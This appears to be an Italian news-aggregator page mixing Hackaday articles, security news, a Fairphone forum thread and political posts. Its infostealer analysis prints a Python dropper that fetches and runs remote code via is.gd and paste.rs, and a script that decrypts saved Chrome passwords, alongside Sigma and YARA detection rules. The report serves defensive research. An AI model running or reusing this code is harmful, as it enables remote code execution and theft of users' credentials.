Salta al contenuto principale




How to Make a Beautiful Floral Keycap Using Resin


Resin keycap made from dried flowers

Here’s a fun build. Over on their YouTube channel our hacker [Atasoy] shows us how to make a custom floral keyboard keycap using resin.

We begin by using an existing keycap as a pattern to make a mold. We plug the keycap with all-purpose adhesive paste so that we can attach it to a small sheet of Plexiglas, which ensures the floor of our mold is flat. Then a side frame is fashioned from 100 micron thick acetate which is held together by sticky tape. Hot glue is used to secure the acetate side frame to the Plexiglas floor, keeping the keycap centered. RTV2 molding silicone is used to make the keycap mold. After 24 hours the silicone mold is ready.

Then we go through a similar process to make the mold for the back of the keycap. Modeling clay is pushed into the back of the keycap. Then silicone is carefully pushed into the keycap, and 24 hours later the back silicone mold is also ready.

The back mold is then glued to a fresh sheet of Plexiglas and cut to shape with a craft knife. Holes are drilled into the Plexiglas. A mix of artificial grass and UV resin is made to create the floor. Then small dried flowers are cut down to size for placement in the top of the keycap. Throughout the process UV light is used to cure the UV resin as we go along.

Finally we are ready to prepare and pour our epoxy resin, using our two molds. Once the mold sets our new keycap is cut out with a utility knife, then sanded and polished, before being plugged into its keyboard. This was a very labor intensive keycap, but it’s a beautiful result.

If you’re interested in making things with UV resin, we’ve covered that here before. Check out 3D Printering: Print Smoothing Tests With UV Resin and UV Resin Perfects 3D Print, But Not How You Think. Or if you’re interested in epoxy resin, we’ve covered that too! See Epoxy Resin Night Light Is An Amazing Ocean-Themed Build and Degassing Epoxy Resin On The (Very) Cheap.

Thanks to [George Graves] for sending us this one via the tipsline!

youtube.com/embed/07K_nX6TEoE?…


hackaday.com/2025/06/26/how-to…



Attenzione! WinRAR: Vulnerabilità Critica che Potrebbe Eseguire Malware


Gli sviluppatori di WinRAR hanno risolto una vulnerabilità relativa all’override della directory, che ha ricevuto l’identificatore CVE-2025-6218. In determinate circostanze, questo bug permetteva l’esecuzione di malware dopo l’estrazione dell’archivio.

La vulnerabilità ha ricevuto un punteggio di 7,8 punti sulla scala CVSS ed è stata scoperta da un ricercatore con il nickname whs3-detonator, che ha segnalato il problema attraverso Zero Day Initiative all’inizio di giugno 2025. Il problema riguarda solo la versione Windows di WinRAR, a partire dalla versione 7.11 e successive, mentre la correzione è stata introdotta nella versione WinRAR 7.12 beta 1, uscita questa settimana.

“Quando si estrae un file nelle vecchie versioni di WinRAR, RAR per Windows, UnRAR e UnRAR.dll, incluso il codice sorgente UnRAR portatile, è possibile utilizzare il percorso specificato in un archivio appositamente predisposto, anziché il percorso specificato dall’utente”, spiegano gli sviluppatori.

In altre parole, un archivio dannoso può contenere file con un percorso relativo modificato, che costringe WinRAR a estrarli in posizioni potenzialmente pericolose, inclusi directory di sistema e cartelle di avvio automatico.

Se il contenuto di tale archivio è dannoso, i file estratti possono essere eseguiti automaticamente, provocando l’esecuzione di codice pericoloso al successivo accesso dell’utente a Windows. Anche se tali programmi vengono eseguiti con diritti di livello utente e non hanno privilegi di amministratore o SYSTEM, sono comunque in grado di rubare dati sensibili, inclusi cookie del browser e password salvate, stabilirsi nel sistema della vittima o fornire accesso remoto ai propri operatori.

Oltre a CVE-2025-6218, nella versione WinRAR 7.12 beta 1 è stata anche risolta una problematica di iniezione HTML, che si verificava durante la generazione di rapporti. Questo bug è stato segnalato dal ricercatore di sicurezza Marcin Bobryk (Marcin Bobryk). Egli spiega che i nomi dei file di archivio contenenti potevano essere incorporati nel rapporto HTML come tag HTML non elaborati. Di conseguenza, ciò poteva portare a iniezioni HTML e JS se i rapporti venivano aperti in un browser.

L'articolo Attenzione! WinRAR: Vulnerabilità Critica che Potrebbe Eseguire Malware proviene da il blog della sicurezza informatica.





c'è un motivo se un questi anni tutte le armi più potenti nato sono state quelle usa e se si è cercato di de-potenziare l'europa con la scusa che tanto c'erano gli usa... trump si deve essere dimenticato tutto questo a cosa serviva (agli usa). l'italia avrebbe a esempio potuto avere l'atomica ma ha dovuto rinunciare a quella come alle armi atomiche o anche solo all'energia atomica applicata alle armi (ad esempio non portaerei atomiche) per accordi con gli usa... adesso vuole un'europa pesantemente armata? secondo me non dovremmo neppure farlo insistere tanto per ottenere quello che vuole.. che poi un'europa pesantemente armata andrà ancora a traino usa tutto questo è da solo sperare per trump...



Walter Verini: il caso Paragon è una ferita


@Giornalismo e disordine informativo
articolo21.org/2025/06/walter-…
Il governo continua a non essere trasparente sul caso Paragon, la vicenda dello spionaggio ai danni di attivisti e giornalisti, o cui telefoni sono stati infettati dal software militare Graphite dell’azienda israeliana Paragon Solutions, che in



Il fallimento della retorica (di G. Gambino)


@Politica interna, europea e internazionale
Nel teatro grande della politica internazionale, il Medio Oriente è il parco giochi preferito dei potenti del mondo (nel caso specifico tutti e tre uomini, tutti e tre anzianotti signori, tutti e tre smaniosi di mostrarsi il bullo più bullo del quartiere). Lo scenario ideale in cui da sempre si intrecciano



CitrixBleed 2.0 aggira l’autenticazione multi-fattore (MFA): Italia esposta


@Informatica (Italy e non Italy 😁)
CitrixBleed 2.0 è la nuova vulnerabilità nei prodotti Citrix NetScaler ADC e Gateway che, se sfruttata, consente agli aggressori di impersonare un utente legittimo e accedere ai servizi aziendali bypassando l’autenticazione multi-fattore (MFA). In Italia sono



Dio, secolarizzazione e Trump


@Giornalismo e disordine informativo
articolo21.org/2025/06/dio-sec…
Siamo davanti a una novità. Che il genere umano si sia sovente trovato davanti a strade diverse e che abbia valutato diverse ricette per fronteggiare i problemi del suo tempo è assodato: è sempre stato così. Ma oggi non si tratta di questo, per molti siamo usciti da una dialettica



È uscito il nuovo numero di The Post Internazionale. Da oggi potete acquistare la copia digitale


@Politica interna, europea e internazionale
È uscito il nuovo numero di The Post Internazionale. Il magazine, disponibile già da ora nella versione digitale sulla nostra App, e da domani, venerdì 27 giugno, in tutte le edicole, propone ogni due settimane inchieste e approfondimenti sugli affari e il



404 Media spoke to Dave McNamee, the original creator of the babyface Vance meme, about free speech, our rights, and how it feels to see the thing you created being blamed for someone's denial of entry to the U.S.

404 Media spoke to Dave McNamee, the original creator of the babyface Vance meme, about free speech, our rights, and how it feels to see the thing you created being blamed for someonex27;s denial of entry to the U.S.#vance #meme #Socialmedia #Immigration



It’s a legal requirement for data brokers to register in the state of California. ARC, the airlines-owned data broker that has been selling your flight information to the government for years, only just registered after being contacted by the office of Senator Ron Wyden.#News
#News


Field Guide to the North American Weigh Station


A lot of people complain that driving across the United States is boring. Having done the coast-to-coast trip seven times now, I can’t agree. Sure, the stretches through the Corn Belt get a little monotonous, but for someone like me who wants to know how everything works, even endless agriculture is fascinating; I love me some center-pivot irrigation.

One thing that has always attracted my attention while on these long road trips is the weigh stations that pop up along the way, particularly when you transition from one state to another. Maybe it’s just getting a chance to look at something other than wheat, but weigh stations are interesting in their own right because of everything that’s going on in these massive roadside plazas. Gone are the days of a simple pull-off with a mechanical scale that was closed far more often than it was open. Today’s weigh stations are critical infrastructure installations that are bristling with sensors to provide a multi-modal insight into the state of the trucks — and drivers — plying our increasingly crowded highways.

All About the Axles


Before diving into the nuts and bolts of weigh stations, it might be helpful to discuss the rationale behind infrastructure whose main function, at least to the casual observer, seems to be making the truck driver’s job even more challenging, not to mention less profitable. We’ve all probably sped by long lines of semi trucks queued up for the scales alongside a highway, pitying the poor drivers and wondering if the whole endeavor is worth the diesel being wasted.

The answer to that question boils down to one word: axles. In the United States, the maximum legal gross vehicle weight (GVW) for a fully loaded semi truck is typically 40 tons, although permits are issued for overweight vehicles. The typical “18-wheeler” will distribute that load over five axles, which means each axle transmits 16,000 pounds of force into the pavement, assuming an even distribution of weight across the length of the vehicle. Studies conducted in the early 1960s revealed that heavier trucks caused more damage to roadways than lighter passenger vehicles, and that the increase in damage is proportional to the fourth power of axle weight. So, keeping a close eye on truck weights is critical to protecting the highways.

Just how much damage trucks can cause to pavement is pretty alarming. Each axle of a truck creates a compression wave as it rolls along the pavement, as much as a few millimeters deep, depending on road construction and loads. The relentless cycle of compression and expansion results in pavement fatigue and cracks, which let water into the interior of the roadway. In cold weather, freeze-thaw cycles exert tremendous forces on the pavement that can tear it apart in short order. The greater the load on the truck, the more stress it puts on the roadway and the faster it wears out.

The other, perhaps more obvious reason to monitor axles passing over a highway is that they’re critical to truck safety. A truck’s axles have to support huge loads in a dynamic environment, and every component mounted to each axle, including springs, brakes, and wheels, is subject to huge forces that can lead to wear and catastrophic failure. Complete failure of an axle isn’t uncommon, and a driver can be completely unaware that a wheel has detached from a trailer and become an unguided missile bouncing down the highway. Regular inspections of the running gear on trucks and trailers are critical to avoiding these potentially catastrophic occurrences.

youtube.com/embed/veCl1BgoI74?…

Ways to Weigh


The first thing you’ll likely notice when driving past one of the approximately 700 official weigh stations lining the US Interstate highway system is how much space they take up. In contrast to the relatively modest weigh stations of the past, modern weigh stations take up a lot of real estate. Most weigh stations are optimized to get the greatest number of trucks processed as quickly as possible, which means constructing multiple lanes of approach to the scale house, along with lanes that can be used by exempt vehicles to bypass inspection, and turnout lanes and parking areas for closer inspection of select vehicles.

In addition to the physical footprint of the weigh station proper, supporting infrastructure can often be seen miles in advance. Fixed signs are usually the first indication that you’re getting near a weigh station, along with electronic signboards that can be changed remotely to indicate if the weigh station is open or closed. Signs give drivers time to figure out if they need to stop at the weigh station, and to begin the process of getting into the proper lane to negotiate the exit. Most weigh stations also have a net of sensors and cameras mounted to poles and overhead structures well before the weigh station exit. These are monitored by officers in the station to spot any trucks that are trying to avoid inspections.
Overhead view of a median weigh station on I-90 in Haugan, Montana. Traffic from both eastbound and westbound lanes uses left exits to access the scales in the center. There are ample turnouts for parking trucks that fail one test or another. Source: Google Maps.
Most weigh stations in the US are located off the right side of the highway, as left-hand exit ramps are generally more dangerous than right exits. Still, a single weigh station located in the median of the highway can serve traffic from both directions, so the extra risk of accidents from exiting the highway to the left is often outweighed by the savings of not having to build two separate facilities. Either way, the main feature of a weigh station is the scale house, a building with large windows that offer a commanding view of the entire plaza as well as an up-close look at the trucks passing over the scales embedded in the pavement directly adjacent to the structure.

Scales at a weigh station are generally of two types: static scales, and weigh-in-motion (WIM) systems. A static scale is a large platform, called a weighbridge, set into a pit in the inspection lane, with the surface flush with the roadway. The platform floats within the pit, supported by a set of cantilevers that transmit the force exerted by the truck to electronic load cells. The signal from the load cells is cleaned up by signal conditioners before going to analog-to-digital converters and being summed and dampened by a scale controller in the scale house.

The weighbridge on a static scale is usually long enough to accommodate an entire semi tractor and trailer, which accurately weighs the entire vehicle in one measurement. The disadvantage is that the entire truck has to come to a complete stop on the weighbridge to take a measurement. Add in the time it takes for the induced motion of the weighbridge to settle, along with the time needed for the driver to make a slow approach to the scale, and each measurement can add up to significant delays for truckers.
Weigh-in-motion sensor. WIM systems measure the force exerted by each axle and calculate a total gross vehicle weight (GVW) for the truck while it passes over the sensor. The spacing between axles is also measured to ensure compliance with state laws. Source: Central Carolina Scales, Inc.
To avoid these issues, weigh-in-motion systems are often used. WIM systems use much the same equipment as the weighbridge on a static scale, although they tend to use piezoelectric sensors rather than traditional strain-gauge load cells, and usually have a platform that’s only big enough to have one axle bear on it at a time. A truck using a WIM scale remains in motion while the force exerted by each axle is measured, allowing the controller to come up with a final GVW as well as weights for each axle. While some WIM systems can measure the weight of a vehicle at highway speed, most weigh stations require trucks to keep their speed pretty slow, under five miles per hour. This is obviously for everyone’s safety, and even though the somewhat stately procession of trucks through a WIM can still plug traffic up, keeping trucks from having to come to a complete stop and set their brakes greatly increases weigh station throughput.

Another advantage of WIM systems is that the spacing between axles can be measured. The speed of the truck through the scale can be measured, usually using a pair of inductive loops embedded in the roadway around the WIM sensors. Knowing the vehicle’s speed through the scale allows the scale controller to calculate the distance between axles. Some states strictly regulate the distance between a trailer’s kingpin, which is where it attaches to the tractor, and the trailer’s first axle. Trailers that are not in compliance can be flagged and directed to a parking area to await a service truck to come by to adjust the spacing of the trailer bogie.

Keep It Moving, Buddy

A PrePass transponder reader and antenna over Interstate 10 near Pearlington, Mississippi. Trucks can bypass a weigh station if their in-cab transponder identifies them as certified. Source: Tony Webster, CC BY-SA 2.0.
Despite the increased throughput of WIM scales, there are often too many trucks trying to use a weigh station at peak times. To reduce congestion further, some states participate in automatic bypass systems. These systems, generically known as PrePass for the specific brand with the greatest market penetration, use in-cab transponders that are interrogated by transmitters mounted over the roadway well in advance of the weigh station. The transponder code is sent to PrePass for authentication, and if the truck ID comes back to a company that has gone through the PrePass certification process, a signal is sent to the transponder telling the driver to bypass the weigh station. The transponder lights a green LED in this case, which stays lit for about 15 minutes, just in case the driver gets stopped by an overzealous trooper who mistakes the truck for a scofflaw.

PrePass transponders are just one aspect of an entire suite of automatic vehicle identification (AVI) systems used in the typical modern weigh station. Most weigh stations are positively bristling with cameras, some of which are dedicated to automatic license plate recognition. These are integrated into the scale controller system and serve to associate WIM data with a specific truck, so violations can be flagged. They also help with the enforcement of traffic laws, as well as locating human traffickers, an increasingly common problem. Weigh stations also often have laser scanners mounted on bridges over the approach lanes to detect unpermitted oversized loads. Image analysis systems are also used to verify the presence and proper operation of required equipment, such a mirrors, lights, and mudflaps. Some weigh stations also have systems that can interrogate the electronic logging device inside the cab to verify that the driver isn’t in violation of hours of service laws, which dictate how long a driver can be on the road before taking breaks.

Sensors Galore

IR cameras watch for heat issues on trucks at a Kentucky weigh station. Heat signatures can be used to detect bad tires, stuck brakes, exhaust problems, and even illicit cargo. Source: Trucking Life with Shawn
Another set of sensors often found in the outer reaches of the weigh station plaza is related to the mechanical status of the truck. Infrared cameras are often used to scan for excessive heat being emitted by an axle, often a sign of worn or damaged brakes. The status of a truck’s tires can also be monitored thanks to Tire Anomaly and Classification Systems (TACS), which use in-road sensors that can analyze the contact patch of each tire while the vehicle is in motion. TACS can detect flat tires, over- and under-inflated tires, tires that are completely missing from an axle, or even mismatched tires. Any of these anomalies can cause a tire to quickly wear out and potentially self-destruct at highway speeds, resulting in catastrophic damage to surrounding traffic.

Trucks with problems are diverted by overhead signboards and direction arrows to inspection lanes. There, trained truck inspectors will closely examine the flagged problem and verify the violation. If the problem is relatively minor, like a tire inflation problem, the driver might be able to fix the issue and get back on the road quickly. Trucks that can’t be made safe immediately might have to wait for mobile service units to come fix the problem, or possibly even be taken off the road completely. Only after the vehicle is rendered road-worthy again can you keep on trucking.

Featured image: “WeighStationSign” by [Wasted Time R]


hackaday.com/2025/06/26/field-…



È morto per colpa di un ransomware! Un’altra vittima si aggiunge alla lista


Non è la prima volta che un attacco informatico si traduce in una perdita di vite umane.
Ne avevamo già parlato nell’articolo I decessi avvenuti per il ransomware. I casi noti, le tendenze e il punto sull’Italia, in cui analizzavamo il legame diretto tra incidenti cyber e morti documentate.

Purtroppo, questo fenomeno è sempre più frequente. Viviamo in un mondo interamente circondato da tecnologie digitali, e proprio per questo esposto al rischio di compromissione. Ma quando il bersaglio non è più un semplice dato, bensì un sistema critico come un pronto soccorso o un’infrastruttura sanitaria, le conseguenze non sono più virtuali: diventano tragicamente reali.

Secondo il National Health Service (NHS), l’anno scorso un attacco ransomware che ha interrotto gli esami del sangue in diversi ospedali di Londra ha contribuito alla morte di un paziente. L’attacco del gruppo di criminalità informatica Qilin contro il servizio di patologia Synnovis con sede a Londra, avvenuto lo scorso giugno, ha causato gravi interruzioni all’assistenza in numerosi ospedali del Servizio Sanitario Nazionale e presso fornitori di servizi sanitari di Londra.

A seguito dell’attacco, gli ospedali non sono stati in grado di eseguire gli esami del sangue alla normale velocità. Un portavoce del King’s College Hospital NHS Foundation Trust ha affermato che questo ritardo è stato tra “una serie di fattori contribuenti” che hanno portato alla morte di un paziente durante l’incidente, come riportato per primo dall’Health Service Journal.

“Purtroppo un paziente è morto improvvisamente durante l’attacco informatico. Come da prassi standard in questi casi, abbiamo effettuato un’analisi dettagliata delle sue cure”, ha dichiarato il portavoce. L’indagine sull’incidente relativo alla sicurezza del paziente ha individuato diversi fattori che hanno contribuito al decesso del paziente. Tra questi, la lunga attesa per l’esito di un esame del sangue a causa dell’attacco informatico che ha colpito i servizi di anatomia patologica in quel momento.

In una dichiarazione, il CEO di Synnovis, Mark Dollar, ha dichiarato: “Siamo profondamente addolorati nell’apprendere che l’attacco informatico criminale dell’anno scorso sia stato identificato come uno dei fattori che hanno contribuito alla morte di questo paziente. Siamo vicini alla famiglia coinvolta”.

Il mese scorso, Recorded Future News ha rivelato che due attacchi informatici che avrebbero interessato il Servizio Sanitario Nazionale (NHS) nel 2024 erano stati formalmente identificati come potenziali fattori di rischio per i pazienti. Si prevede che questi attacchi riguardino Synnovis e il Wirral University Teaching Hospital NHS Foundation Trust, causando ritardi nei trattamenti oncologici.

Si ritiene che i dati di oltre 900.000 individui siano stati compromessi dalle tattiche estorsive del gruppo ransomware, che prevedevano la pubblicazione dei risultati dei test che rivelavano i nomi dei pazienti con sintomi di infezioni sessualmente trasmissibili e cancro.

Un’analisi dei dati condotta dagli specialisti in violazioni dei dati CaseMatrix ha identificato nomi personali, date di nascita, numeri di telefono del Servizio Sanitario Nazionale e, in alcuni casi, dettagli di contatto personali, insieme ai moduli di patologia e istologia utilizzati per condividere i dati dei pazienti tra reparti medici e istituzioni. A un anno dalla violazione, i pazienti interessati non sono ancora stati informati su quali dati siano stati esposti nell’incidente.

L'articolo È morto per colpa di un ransomware! Un’altra vittima si aggiunge alla lista proviene da il blog della sicurezza informatica.



Un nuovo infostealer fileless viene veicolato da Telegram e dai servizi legittimi


TLP: AMBER
Analista: Agostino Pellegrino, Crescenzo Cuoppolo, Alessio Bandini
Data ultima revisione: 2025-06-24

Questo report tecnico forense documenta l’analisi completa di un infostealer multi-stadio veicolato tramite un loader fileless in Python, identificato con la sigla “AP”. L’intera catena di infezione è eseguita in memoria e sfrutta servizi legittimi pubblici (Telegram, is.gd, paste.rs) per evitare la rilevazione e semplificare l’aggiornamento remoto del payload.

Il file iniziale, denominato Photos, contiene un dropper che esegue dinamicamente un secondo stadio offuscato, il quale a sua volta decodifica ed esegue in memoria un infostealer capace di esfiltrare informazioni sensibili da browser Chromium.

Catena di Infezione

Stadio 1 – Dropper Iniziale


Il file Photos contiene codice Base64 offuscato:

___________ = 'ADN_UZJomrp3vPMujoH4bot'; exec(__import__('base64').b64decode('...'))

Decodifica del codice:

import requests, re
exec(
requests.get(
requests.head(
f'https://is.gd/{match.group(1)}', allow_redirects=True
).url
).text
)

if (
match := re.search(
r'

Funzionamento:

  • Recupera da un canale Telegram un codice og:description (es. fVmzS)
  • Usa is.gd per risolvere il link accorciato
  • Recupera un payload da paste.rs ed esegue dinamicamente


Stadio 2 – Loader Offuscato


Contenuto scaricato da paste.rs/fVmzS. Esegue la seguente catena:

exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b85decode("c$|c~*|PFlk|y|1XNVIgA|vOF$g0Ys7>c3D)_@p{S!e)(1e%eo3lNe(LIXmGNenkpZCz$

Dopo b85 → zlib → marshal, è necessario un ulteriore passaggio:

decoded = bytearray([b ^ 0x04 for b in payload_bytes])

Il risultato è un bytecode deoffuscato eseguibile direttamente in memoria:

import os, shutil, zipfile, sqlite3
from Cryptodome.Cipher import AES
import win32crypt
import json
import base64

# Estrazione dati da Chromium (semplificato)

def get_chrome_data():
local_state_path = os.path.expanduser('~') + r"\AppData\Local\Google\Chrome\User Data\Local State"
with open(local_state_path, "r", encoding="utf-8") as f:
local_state = json.loads(f.read())
key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])[5:]
key = win32crypt.CryptUnprotectData(key, None, None, None, 0)
[1] login_data_path = os.path.expanduser('~') + r"\AppData\Local\Google\Chrome\User Data\Default\Login Data"
shutil.copy2(login_data_path, "Loginvault.db")
conn = sqlite3.connect("Loginvault.db")
cursor = conn.cursor()
cursor.execute("SELECT origin_url, username_value, password_value FROM logins")
for row in cursor.fetchall():
login_url = row
[0] username = row
[1] password = win32crypt.CryptUnprotectData(row[2])[1].decode()
print(f"URL: {login_url}\nUsername: {username}\nPassword: {password}\n")
cursor.close()
conn.close()
os.remove("Loginvault.db")
get_chrome_data()

Stadio 3 – Infostealer


Il codice risultante:

  • Raccoglie credenziali, cookie, cronologia e carte da Chromium
  • Cattura fingerprinting del sistema
  • Comprimi dati in archivio .zip
  • Prepara e invia l’esfiltrazione verso un server remoto (C2)


Indicatori di Compromissione

Tecniche MITRE ATT&CK


  • T1059 – Command and Scripting Interpreter
  • T1027 – Obfuscated Files or Information
  • T1071.001 – Web Protocols
  • T1082 – System Information Discovery
  • T1567.002 – Exfiltration over Web Services
  • T1218.010 – Proxy Execution (custom variant)


Rilevazione

Sigma Rule


title: Python Fileless Loader via Telegram and is.gd
logsource:
category: process_creation
product: windows
detection:
selection:
Image: '*\python.exe'
CommandLine|contains:
- requests.get(
- exec(
- t.me/
- is.gd/
condition: selection
level: high
description: Rileva dropper Python fileless con payload remote

YARA Rule


rule Fileless_Telegram_Loader {
meta:
description = "Rileva loader fileless basato su Telegram + is.gd"
author = "Agostino Pellegrino (apinfosec.com)"
version = "1.1"
date = "2025-06-24"
strings:
$a = "exec(requests.get(" ascii
$b = "https://t.me/" ascii
$c = "https://is.gd/" ascii
$d = "og:description" ascii
condition:
all of them and filesize

Raccomandazioni


  • Isolare ambienti Python non gestiti
  • Bloccare traffico a t.me, is.gd, paste.rs ove non necessario
  • Attivare logging avanzato su processi RAM-residenti
  • Applicare detection YARA e Sigma in EDR/SIEM
  • Segnalare a CSIRT nazionale


Conclusioni


L’analisi tecnica condotta ha evidenziato l’elevato livello di sofisticazione dell’infostealer “AP”, capace di operare completamente in memoria, eludendo gran parte dei meccanismi di rilevamento tradizionali. La catena d’infezione multi-stadio utilizza un dropper fileless scritto in Python e sfrutta servizi pubblici legittimi — come Telegram, is.gd e paste.rs — per veicolare, aggiornare e rendere dinamico il payload finale.

Il secondo stadio, fortemente offuscato, culmina nell’esecuzione di un infostealer con capacità avanzate di esfiltrazione dati da browser Chromium-based, comprese credenziali salvate, cookie, cronologia e informazioni sensibili.

L’uso creativo e malevolo di meccanismi comuni (come i meta tag HTML, URL accorciati e servizi di messaggistica) rende questa minaccia particolarmente insidiosa, dimostrando una crescente tendenza all’abuso di infrastrutture legittime per finalità illecite.

Le tecniche MITRE ATT&CK individuate confermano il comportamento stealth e modulare del malware. L’adozione di meccanismi di rilevazione specifici, come regole Sigma e YARA personalizzate, è fondamentale per mitigare efficacemente questa minaccia. Inoltre, l’implementazione di policy restrittive e il monitoraggio continuo degli ambienti Python non gestiti rappresentano misure difensive prioritarie.

Questo caso studio rappresenta un chiaro esempio dell’evoluzione dei moderni infostealer verso architetture completamente fileless, con capacità di persistenza e aggiornamento che richiedono una risposta difensiva altrettanto dinamica e proattiva.

L'articolo Un nuovo infostealer fileless viene veicolato da Telegram e dai servizi legittimi proviene da il blog della sicurezza informatica.



Curiosità sul Fairphone? Chiedete e vi sarà detto


Dal 2020 sono un utente #Fairphone, prima con il FP3+ e adesso con il FP5.

Sono un "Fairphone Angel" (è un nome che fa un po' ridere, lo so 😁 ) ovvero una di quelle persone che mettono la loro esperienza a disposizione di chi possiede un Fairphone o è interessato a saperne qualcosa di più (*). Maggiori informazioni le potete trovare qui.

Ho visto che nel Fediverso c'è un certo interesse su questi argomenti e così ho pensato di mettere un post "ad hoc" nel caso qualcuno volesse informazioni sul telefono.

Il sito ufficiale Fairphone è qui.

Bene, a voi la linea...

(*) Non abbiamo nessun rapporto organico con l'azienda né riceviamo compensi sotto nessuna forma, semplicemente crediamo in questo progetto, ci fa piacere contribuire in qualche modo e lo facciamo così.

in reply to Max 🇪🇺🇮🇹

Io chiedo una cosa che potrebbe riguardare molti utenti Android.

S'è capito se la app di sistema è solo l'androidSystemWebview? Dico perché c'è anche googlePlayServices, che pesa più di un giga, e che se disattivata non fa più funzionare le app Messaggi, Contatti e quindi Chiamate. (Poi, abbiamo consigli per sostituire queste ultime? Sembra mossa azzardata per quanto sono basilari, ma fa brutto vedersi anche queste targate google.)

in reply to Low res Loud audio

@Loud audio

Sono domande un po' troppo tecniche per me, se le fai nel forum Fairphone magari trovi qualcuno che può rispondere.

Posso però dirti che sul mio telefono ci sono entrambe e che non possono essere disinstallate, la prima è di 80 MB circa e la seconda di più di un GB.

Comunque il Fairphone oltre a essere venduto con Android è venduto anche con /e/OS che a quanto ne so è un Android "de-googlizzato".

in reply to Max 🇪🇺🇮🇹

Quale forum dici?
Io presi un FP4 prima che fosse disponibile l'opzione /e/ per cui riformulo meglio la delusione accennata in
snowfan.masto.host/@siro/11474…
e riassumibile come: potevano anche dire che con un FP non degooglizzi un bel niente.

Il fatto è che, disattivate le principali app di Google come Chrome, gMail, Maps, Meet, Foto (ancora un'altra decente per gestire le immagini non ce l'ho), Drive ecc..., rimangono le una o due propriamente "di sistema" trattate sopra, e le altre >>

in reply to Low res Loud audio

->
basilari come Contatti, Messaggi e Chiamate. Il che fa orrore ma ok poiché almeno queste ultime si capisce a cosa servono.
Solo che, come si vede nello screenshot, ce ne sono poi (forse i tutti gli Android degli ultimi 5 anni) tante altre ancora, "minori" che non saprei da dove partire per togliere.

Ammetto anche che, fino a due anni fa, ero rimasto a un telefono più semplice e dove, essendoci meno app, era più facile sostituirle o toglierle godendosi un minimo il detox.

@max

Questa voce è stata modificata (2 mesi fa)
in reply to Low res Loud audio

@Loud audio

Scusa il ritardo ma in questi giorni sono stato un po' a spasso.

Dunque... per come la conosco io la Fairphone ha come mission quella di rendere disponibile un telefono rispettoso dell'ambiente e dei diritti umani. Non mi pare ci sia un focus altrettanto accentuato sulla privacy e credo sia il motivo per cui non abbiano spinto troppo sulla de-googlizzazione del loro telefono oltre il dare la possibilità di comprare il telefono con /e/ preinstallato.

Sulle tante app che chissà cosa fanno e perché non posso disinstallarle non so cosa dire, non so neanche quanta libertà abbia chi usa Android di ritagliarsi un sistema dove tutto sia customizzabile.

Mi pare che qualcosa si possa rimuovere tramite adb, l'avevo usato per qualche minuto tanto per vedere cosa fosse.

Credo che non insistere troppo sulla de-googlizzazione serva anche a dare un telefono più "user friendly". Già chi si prende un Fairphone si prende un telefono non facile, come scrivevo, se poi gli togli anche tutti i punti di riferimento tipo Gmail, ecc. alla fine ti ritrovi con un prodotto da nerds che comprerebbero in tre e così addio...

in reply to Max 🇪🇺🇮🇹

Capisco sul FP, forse avevo intravisto chissà che io, grazie.

Però in generale noi fediAndroidi, il togliere quei punti di riferimento, dovremmo considerarlo pratica condivisa, bastando testardaggine senza essere dei nerd (parola sfuggita di mano). Altrimenti quando mai avremo una fetta di popolazione convinta che c'è da diffidare dei servizi preinstallati nel cellulare comprato?

Propongo di esser coesi almeno sulle tante app google secondarie che deve portare mala sorte aggiornarle.

in reply to Low res Loud audio

@Loud audio

Io credo che bisogna valutare quali lotte fare perché farle tutte è impossibile.

Io per esempio negli ultimi sei mesi ho lasciato Facebook e mi sono fatto un file repository sul mio spazio web (con NextCloud) per sostituire Google Drive.

Per tante cose purtroppo resterò legato alle Big Tech, staccarsi del tutto per me è impossibile per vari motivi, i principali sono che non ho il tempo materiale per ricostruirmi e gestirmi in privato tutti i servizi che sto usando e che vivo in un ecosistema informatico in cui quei sistemi sono diffusissimi e usati da tutte le persone che conosco. Staccarmi da tutto (penso a WhatsApp ad esempio) vorrebbe dire per me diventare un eremita digitale.

Un telefonino completamente de-googlizzato al momento non posso permettermelo però è una delle cose che mi interesserebbe di più, è nella lista delle cose da fare 😁

in reply to Max 🇪🇺🇮🇹

Ma sì che siamo concordi: a meno che non sia l'unica, per portare a casa la pagnotta o per non perdere i propri cari, evitare Gafam e comportamenti simili. Ciao


Riad tra Usa e Cina, la doppia via della difesa aerea. Scrive Mayer

@Notizie dall'Italia e dal mondo

La capacità dimostrata dall’Iran di “bucare” lo spazio aereo di Israele con nuovi missili balistici a medio e lungo raggio ha messo in allarme tutti gli Stati della regione, con l’eccezione della Turchia, che può contare sull’articolo 5 della Nato, peraltro solennemente riaffermato nella dichiarazione finale del



Spagna e Nato, isolazionismo o posizionamento strategico? L’analisi di Caffio

@Notizie dall'Italia e dal mondo

Con una nuova mossa “pacifista”, dopo aver preso le distanze dall’operazione Ue nel mar Rosso contro gli Houthi, Madrid di dissocia ora dalle decisioni Nato sull’incremento delle spese difesa. Anche se motivata da ragioni sociali, la scelta del governo Sanchez appare



An Ohio man is accused of making violent, graphic deepfakes of women with their fathers, and of their children. Device searches revealed he searched for "undress" apps and "ai porn."#Deepfakes #AI #AIPorn


Al via la raccolta firme della proposta di iniziativa popolare per legalizzare tutte le scelte di Fine vita


QUI per firmare la proposta di legge online


Si è tenuta oggi, giovedì 26 giugno, in Piazza XXV Aprile a Milano, la conferenza stampa di lancio della raccolta firme per una proposta di legge di iniziativa popolare finalizzata a legalizzare tutte le scelte di fine vita, inclusa l’eutanasia, promossa dall’Associazione Luca Coscioni.

Nel corso dell’iniziativa – alla quale hanno preso parte Marco Cappato, tesoriere dell’Associazione Luca Coscioni e Matteo Mainardi, coordinatore delle campagne sul fine vita – insieme alla consigliera regionale della Lombardia (in quota Partito Democratico) Carmela Rozza, l’esponente del gruppo consiliare di Alleanza Verdi e Sinistra a Sesto San Giovanni Michele Foggetta, il consigliere comunale ed esponenti dei Sentinelli Milano, Alessandro Giungi – è stato attivato il primo tavolo di raccolta firme. Nei prossimi giorni, l’attività proseguirà in centinaia di piazze italiane.

L’obiettivo è di raccogliere le firme di almeno 50.000 persone in due settimane necessarie per poter depositare la proposta in Parlamento prima della ripresa della discussione sul fine vita prevista in Senato il 17 luglio.


